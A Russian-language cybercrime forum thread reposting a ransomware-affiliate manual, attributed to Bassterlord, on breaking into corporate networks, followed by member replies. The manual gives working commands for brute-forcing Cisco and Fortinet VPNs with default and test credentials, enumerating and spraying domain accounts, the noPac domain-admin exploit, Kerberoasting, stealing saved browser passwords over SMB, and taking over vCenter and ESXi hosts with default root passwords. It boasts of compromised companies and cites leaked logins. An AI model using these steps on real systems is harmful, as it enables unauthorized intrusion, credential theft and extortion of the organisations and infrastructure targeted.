What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Этого вам никто не расскажет! Мануал по работе с сетями v2.0 от Bassterlord (FishEye)

famekid

Light Weight
Депозит
$0
Всем привет =D этот мануал обрезан Bassterlord'ом!
Возьмите себе чаёк и начинайте читать годноту =))

Добавлю от себя: я зашел на этот форум из-за басстерлорда, увидел на соседнем форуме про него статью месяц назад и стало очень интересно про этот движ )) возможно кто-то из-за этой статьи захочет стать хацкером


Страница 1:



Этого вам никто не расскажет!
Мануал по работе с сетями v2.0

Внимание!
Материал содержит убойный контент!

Все совпадения с реальными компаниями – просто совпадения!

Страница 2:


Добыча мата

Страница 3:



Ну здорова давно не слышалисьне виделись =)
Итак, начнем.

Первое что нам понадобится это арендованный сервер чембыстрее, тем лучше.

Для удобства работы желательно установить на серв внц или рдпклиент думаю, как это делать нагуглите сами в крайнем случаеспросите у сапорта он вам все установит.

(в кали все установлено по умолчанию)


Страница 4:



Немножечко предыстории

Я со своей командой как обычно отрабатывал таргеты.

Ничего не предвещало беды, но вдруг ко мне в токс залетает “Сотрудник X” и задвигает тему нашел мол фортик.

Контора жир просто мега жир главное проглотить и не подавится.

Смотрю я на это чудо чудное и не могу поверить своим глазам.

Revenue: 25 000 000 000$

И вдруг мой глаз цепляется за креды от впна компании……

Login: wzv

Password: 12345678

Серьезно бл#ть?

Передаю приветы ************

Спасибо за бабки =)

Сначала подумал с логистикой проблемы и хотел вломить пиздян Сотруднику X

Ну как? КАК ТАКОЕ МОЖЕТ БЫТЬ ЧТОБ ТЕБЯ ЗАБЫТЬ И НЕ МОГУУУУУУУ!?

Ну в общем вы поняли, чем мы сегодня займемся?


Страница 5:


Брут корпоративных VPN


Страница 6:



Врываемся в наш арендованный сервер

Открываем консоль пишем

systemctl start postgresql

msfdb init

msfconsole

Жмем enter

Далее прописываем по списку

Для брута Cisco SSL VPN

use auxiliary/scanner/http/cisco_ssl_vpn

set USERNAME берем рандомное часто встречающееся имя пользователя

set PASSWORD указываем пароль

set PASS_FILE указываем файлик с дефолт паролями не более 3 штук

set PASS_FILE – только в том случае если хотите меньше тратить
времени на перезаходы на сервак для установки других параметров


set THREADS 10

set RHOSTS file: тут указываем файлик с ипами Cisco SSL VPN

пишем exploit тычем ентер и забываем за сервак дня так на
3 после завершения сканирования вводим команду сreds

Сканирование не начинается сразу, а только через 30-50 мин




Страница 7:



Итак, премию дебилам сисадминам и тестовые открытые учетныезаписи на ВПН =)

Только по test – test у меня насканило 400 доступов по другим меньше

Сам фортики пока не тестил но боюсь представить сколько выхлопа

будет. auxiliary/scanner/http/fortinet_ssl_vpn

модуль для форти

Думаю, там сами разберетесь принцип тотже

Итак, что мы имеем

Благодаря тупости сисадминов и оставленным дефолтным паролям, итестовым учетным записям после чека всего материала статистикавыглядит следующим образом:


Страница 8:



Всего айпи в скане 300 000

Открытые миллиардники USA

15 шт

Конторы от 50кк до 700кк

230 шт

Конторы с меньшей ревой либо не интересные госы итд

155

Ах ну******************************************************************************************

Конторка : ************

Логин test

Пароль test

Таким образом вы можете банально брутить впны и чем больше у васчасто встречающихся имен пользователей есть, тем больше вы откроете.



Страница 9:




МММ аху№нна
Остальные даже не стану перечислять
Как итог мы выяснили что у конторы с суперахуенной защитоймогут быть банально не отключены тестовые учетки на ВПН.

Что вас сильно удивит конторы никем не тронуты, то есть вызалетаете почти всегда в нетронутый материал.


Страница 10:



************************************************************************ - + *****
Чтобы прогнать все это дело по дефолт паролям и по 1 штуке, а иначе просто мощностей у вас не хватит у вас уйдет несколько лет жизни и работы.

Я ******** что в случае накрыва *************************************** открытый доступ, как и базы данных этой ***********.
А *******************************************************************************************.******************************


Страница 11:


Открыть
не
открываемое


Страница 12:



Многим из вас знакома ситуация, когда вы просканировали всеуязвимости, но поэксплуатировать их вам не удалось?

Итак, сканим сетку на наличие 88 порта.

Как мы видим, на 88 почти всегда торчит DC

Копируем айпи этих DC В отдельный текстовик

C:\Users\user\Desktop\123.txt

Открываем NMAP

И делаем

nmap -p 3389,445 -v -iL "C:\\Users\\user\\Desktop\\123.txt" -script rdpntlm-info,smb-enum-users,smb-os-discovery

В выдаче если повезет мы получим список учетных записейсразу. Если не прокатывает:

Выписываем себе вот эту строку DNS_Domain_Name:

Там может быть любое значение

Далее в прикрепленном архиве я дам вам софтину Kerbrute.exe


Страница 13:



Используем ее следующим образом

:C:\kerbrute.exe userenum C:\userlist.txt --dc 10.20.10.6 -d rushenterprises.com

Тычем enter и ждем пока переберутся все предполагаемыеучетки на домене.

После этих манипуляций копируем все что нашел кербрут к себев отдельный текстовик и чистим все оставляя только логины безприписки @домен

Идем в кали линукс

Открываем консоль

Пишем туды sudo legion

Ставим все как у меня предварительно указав файлик с логинами,который нашел кербрут и айпи DC.

Пароли по дефолту составьте свой список из 200 самых частыхпаролей.

Теперь остается ждать результатов, которые в логе выглядитпримерно вот так:

LDAP: engineering.calendar:password

Таким образом мы получаем валидную юзерку либо сразуадминку для домена, который мы не пробили уязвимостями.

После этого можно просканировать домен заново с найденнымикредами и по сканеру узнать все учетные записи на домене ископировать их они понадобятся нам для следующих шагов.


Страница 14:



Если мы потеряли доступ к конторе либо корп закрыл намдоступ в впн снятые учетные записи можно использовать дляповторного перебора доступа к компании

В этом нам помогут “Всадники” =)

ZOOMEYE FOFA CENSYS SHODAN

Просто хреначим сайт конторы в поисковую строку этихпоисковиков и в итоге находим альтернативные доступы идругие впн той же самой конторы так как обычно у крупныхкорпов далеко не один филиал!


Страница 15:



NOPAC
GetUserSPNs
GetNPUsers


Страница 16:



Итак, первым делом


git clone https://github.com/Ridter/noPac


Далее подставляем наши полученные данные

И пробуем их на каждом айпи где присутствует наш 88 порт cdnoPac

python noPac.py rush-enterprises.com/engineering.calendar:

password -dc-ip 10.0.0.21 --impersonate Administrator -dump-use-ldap

Далее пойдет дамп кредов как в зерологоне

Что делать с ними дальше было показано в первой частиобъяснять не стану.

Если с noPac не повезло пробуем извлечь захешированныепароли из домена.

Переходим в импакет в кали

GetUserSPNs.py rush-enterprises.com/engineering.calendar:password -dc-ip 10.0.0.21 -request

По итогу нам должно выдать хеши которые брутятся черезхешкат.

Каждый раз тип хеша уникален поэтому расписывать невижу смысла смотрите помощь по хешкат.

Если не выходит тогда

GetNPUsers.py rush-enterprises.com/ -usersfile/

home/kali/user.txt -no-pass -dc-ip 192.168.17.72 -request


В юзерфайл кладем лист найденных юзеров если вам повезетполучите хеши для брута =)

GetNPUsers.py rush-enterprises.com/ -usersfile
/home/kali/user.txt -no-pass -dc-ip 192.168.17.72 -request

В юзерфайл кладем лист найденных юзеров если вам повезетполучите хеши для брута =)


Страница 17:



ESXI
На дурака


Страница 18:



Определенных действий по каждой компании не существует
нужно только реагировать на то, что видишь.
Шаблон для каждой конторы всегда разный!

Представим ситуацию

Вы открыли контору добыли креды от компов, но увы вы
сталкиваетесь допустим с одним из этих ав Cylance,
Sophos (который в версии с хитманом), Falcon, Sentinel.

Пытаться обойти эти ав сложновато, однако выход есть если
контора полностью стоит на ESXI, то глупый сисадмин мог
допустить несколько ошибок в формировании структуры сети.
Во-первых, нам нужен будет скан всей сети.

Выделяем абсолютно все айпи адреса в сканере и пихаем эти
адреса в текстовик скажем на рабочем столе.
Открываем nmap и делаем там:

nmap -p 443 -iL "C:\\Users\\user\\Desktop\\123.txt" --script vmwareversion

Соответственно указываем наш путь к листу айпи который создали

Запускаем скан по итогу скана получаем следующее.

Пример: Output|
vmware-version:|
Server version: VMware ESX 4.1.0|
Build: 348481|
Locale version: INTL 000|
OS type: vmnix-x86|
Product Line ID: esx

Я для себя отфильтровал все самое не нужное в итоге

получилось следующая картина:


Страница 19:



Nmap scan report for 192.168.174.43
Server version: VMware ESXi 5.5.0
Nmap scan report for 192.168.174.40
Server version: VMware vCenter Server 5.5.0
Nmap scan report for 192.168.174.41
Server version: VMware ESXi 5.5.0
Nmap scan report for 192.168.174.44
Server version: VMware ESXi 6.5.0
Nmap scan report for 192.168.174.42
Server version: VMware ESXi 5.5.0
Первым делом идем на vCenter

https://192.168.174.40

Если не пускает на айпи винцетра логинимся на любой комп внутри сетии пробуем с него.

Итак, перед нами заветная панель ввода логина и пароля.

Первое что нужно сделать это попробовать войти в нее с учетками доменадминов.

Если у вас есть пароль от учетной записи администратора пробуем его

К примеру, Administrator@vsphere.local пароль

Дальше стоит попробовать всех домен админов которых удалось найти

Если пароли не подходят есть один метод поиска машин, которыераскрывают эти креды.

Админы сети как-то же в них заходят, верно?


Страница 20:



Идем в наш сканер

Создаем настройку как показано на скрине

Ресканим сетку с домен админ правами.

По итогу получаем те компы где можно быстро нарыть инфу оструктуре сети и украсть пароли от ESXI




Страница 21:




Достаточно заглянуть в документы и рабочие столы залогиненыхпользователей.

Некоторые сисадмины не парятся и хранят все пароли сразу втекстовиках на своих рабочих столах или сохраняют в браузерах.

Я использую утилиту

Password-Recovery For Firefox
От нирсофта
В ней есть одна особенность если указать путь к профилюпользователя фаерфокс через смб он без проблем состилит унего пароли, даже не заходя на сам комп через рдп.


Страница 22:



Domain\karen.admin password

Если нам удалось состилить пароли от VC идем туды
Ну а дальше вводим все ESXI в домен и создаем там своего юзера
Ранее за меня подобную тему раскрыл пользователь:
Он довольно подробно описал как ресетать пароли от
ESXI если у нас есть доступ к VC поэтому не вижу смысла тутописывать более подробно.
Его тема для ознакомления
Есть уникальный метод кхм…….. “ЭкСпЛоеТ@”

По-другому не назовешь =D
ЭтоLogin: root
Passwords: abc.
1231qaz@WSX
P@ssw0rd Passw0rd
password
НУ ДАЛЬШЕ ВЫ ПОНЯЛИ =D

Причем последнее открывает половину ESXI 50 на 50
И никакой 0дей не нужен просто человеческая тупость инежелание вводить руками в консоли сложные пароли дляподключения к тому же ESXI по SSH


Страница 23:



Ну и напоследок немного статистики
Тестовыми учетками test test взломано:
4865 – Cisco SSL VPN
9870 – Fortinet VPN
Остальное отдаю вам на растерзание дальше по дефолтлогинам и паролям у всех одинаковые шансы.
Но ведь есть еще и другие типы впнов можете самизаказать кодера который напишет брут под это дело.


Страница 24:




ВНИМАНИЕ!
Сбрученные VPN могут отвечать за критически важнуюинфраструктуру многих стран!
Лично мной найдено * ********* предприятий в том числе и в ***!
Если не знаете лучше туда не лазить так как
колониал пайплайн #2 никому не нужен!
Я не являюсь политически мотивированым хакером а просто
показываю на сколько тупы бывают админы сетей даже в самых
крупных корпорациях по всему миру!


Конец!
 
Ты уже третий кто за последние 24 часа его публикует. В поиске/ленте же всё есть
 
может следовало текст оформить в виде текста, а не тупо скриншоты публиковать или статья рассчитана на тех, кто не умеет скачивать с файлообменника?
https://anonfiles.com/dbZb17tcz4/man_pdf
 
ппц. я ещё понимаю наше советское "летела ракета, упала в болото", но пендосским сисадминам же по десять килобаксов платят, как можно настолько наплевательски относиться к своей работе?
 
а нахуя это выкладывать - я не пойму. или я что-то пропустил?
 
Dread Pirate Roberts сказал(а):
Посмотреть вложение 57540

ппц. я ещё понимаю наше советское "летела ракета, упала в болото", но пендосским сисадминам же по десять килобаксов платят, как можно настолько наплевательски относиться к своей работе?
Нажмите, чтобы раскрыть...
это только к лучшему)
 
zackfox3 сказал(а):
Так стоп! А где намутить ипы цыски?
Нажмите, чтобы раскрыть...
Насканить массканом или змапом или зграбом по портам циски, очевидно... нужны ещё диапазоны адресов разумеется актуальные, ну или просто заюзать сервис масскан.онлайн, но лучше самому
 
Николай Лихачёв сказал(а):
Насканить массканом или змапом или зграбом по портам циски, очевидно... нужны ещё диапазоны адресов разумеется актуальные, ну или просто заюзать сервис масскан.онлайн, но лучше самому
Нажмите, чтобы раскрыть...
в nmap есть команда -sV, а в масскане есть подобная команда ?
 
Top